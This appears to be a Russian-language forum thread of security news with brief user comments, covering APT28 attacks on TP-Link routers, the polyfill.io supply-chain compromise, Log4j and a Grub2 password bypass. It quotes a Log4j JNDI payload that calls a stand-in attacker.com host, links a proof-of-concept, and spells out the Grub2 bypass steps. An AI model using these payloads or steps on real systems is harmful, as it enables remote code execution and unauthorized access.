Российская кибергруппировка APT28 использует уязвимости маршрутизаторов для перехвата DNS, что позволяет осуществлять атаки типа «злоумышленник посередине» и красть пароли и токены аутентификации.

Список моделей с уязвимостями
TP-LINK LTE WIRELESS N ROUTER MR6400
TP-LINK WIRELESS DUAL BAND GIGABIT ROUTER ARCHER C5
TP-LINK WIRELESS DUAL BAND GIGABIT ROUTER ARCHER C7
TP-LINK WIRELESS DUAL BAND GIGABIT ROUTER WDR3600
TP-LINK WIRELESS DUAL BAND GIGABIT ROUTER WDR4300
TP-LINK WIRELESS DUAL BAND ROUTER WDR3500
TP-LINK WIRELESS LITE N ROUTER WR740N
TP-LINK WIRELESS LITE N ROUTER WR740N/WR741ND
TP-LINK WIRELESS LITE N ROUTER WR749N
TP-LINK WIRELESS N 3G/4G ROUTER MR3420
TP-LINK WIRELESS N ACCESS POINT WA801ND
TP-LINK WIRELESS N ACCESS POINT WA901ND
TP-LINK WIRELESS N GIGABIT ROUTER WR1043ND
TP-LINK WIRELESS N GIGABIT ROUTER WR1045ND
TP-LINK WIRELESS N ROUTER WR840N
TP-LINK WIRELESS N ROUTER WR841HP
TP-LINK WIRELESS N ROUTER WR841N
TP-LINK WIRELESS N ROUTER WR841N/WR841ND
TP-LINK WIRELESS N ROUTER WR842N
TP-LINK WIRELESS N ROUTER WR842ND
TP-LINK WIRELESS N ROUTER WR845N
TP-LINK WIRELESS N ROUTER WR941ND
TP-LINK WIRELESS N ROUTER WR945N

Кто-то удивлён что это TP-Link?

https://www.ncsc.gov.uk/new...hijacking-operations

Какую-то уязвимость нашли в телеге, с возможностью удалённого выполнения кода.
Какие платформы подвержены неизвестно.
https://www.zerodayinitiati...advisories/upcoming/

Домены cdn[.]polyfill[.]io и bootcss[.]com скомпрометированы, заразив вредоносным кодом более 110 000 веб-сайтов
Изменение произошло после того, как подозреваемая китайская фирма приобрела домен в начале 2024 года.

На сайте предлагались широко используемые фрагменты кода для старых браузеров, которые позволяли использовать современные функции Javascript.

Вредоносное ПО распространяется через домен с февраля 2024 года.

Вредоносный код генерирует полезные нагрузки, которые различаются в зависимости от заголовков HTTP, что обеспечивает большую степень обфускации за счет активации только на определенных устройствах, задержки выполнения и обхода пользователей-администраторов, что позволяет избежать обнаружения.

Также было замечено, что Google блокирует рекламу Google Ads на веб-сайтах, использующих зараженный код, предположительно для уменьшения количества жертв. Технический гигант также разослал предупреждения владельцам сайтов. Владельцы сайтов должны как можно скорее принять меры для снижения рисков для себя и своих пользователей.

https://www.spiceworks.com/...ck-infects-websites/

Никогда такого не было и вот опять

Владельцы сайтов должны как можно скорее принять меры для снижения рисков для себя и своих пользователей.

Наконец-то начать загружать библиотеки со своего сервера.

Уязвимость в Apache Log4j, затрагивающая многие Java-проекты
https://www.opennet.ru/open.../art.shtml?num=56319

проблеме подвержены почти все проекты, использующие такие фреймворки, как Apache Struts, Apache Solr, Apache Druid или Apache Flink, включая Steam, Apple iCloud, клиенты и серверы игры Minecraft.

Проблема была вызвана тем, что log4j поддерживает обработку специальных масок "{}" в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу. Возвращённый сервером атакующего путь (например, http://second-stage.attacker.com/Exploit.class) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.

Эксплоит
https://github.com/tangxiaofeng7/apache-log4j-poc

--
Вот эту фичу с загрузкой классов и их выполнению всегда считал какой-то java-дичью.

в загрузчике Grub2 обнаружена уязвимость, позволяющая обходить защиту паролем, и дающая полный доступ к шеллу.
Эксплоит: вместо введения пароля нажать на Backspace ровно 28 раз, а потом Enter
Если вместо ввода пароля нажимать на Backspace, то из-за пропущенной проверки программа заезжает за пределы буфера и начинает затирать нулями память с отрицательным смещением.

http://malaya-zemlya.livejournal.com/757068.html
http://hmarco.org/bugs/CVE-...tication-bypass.html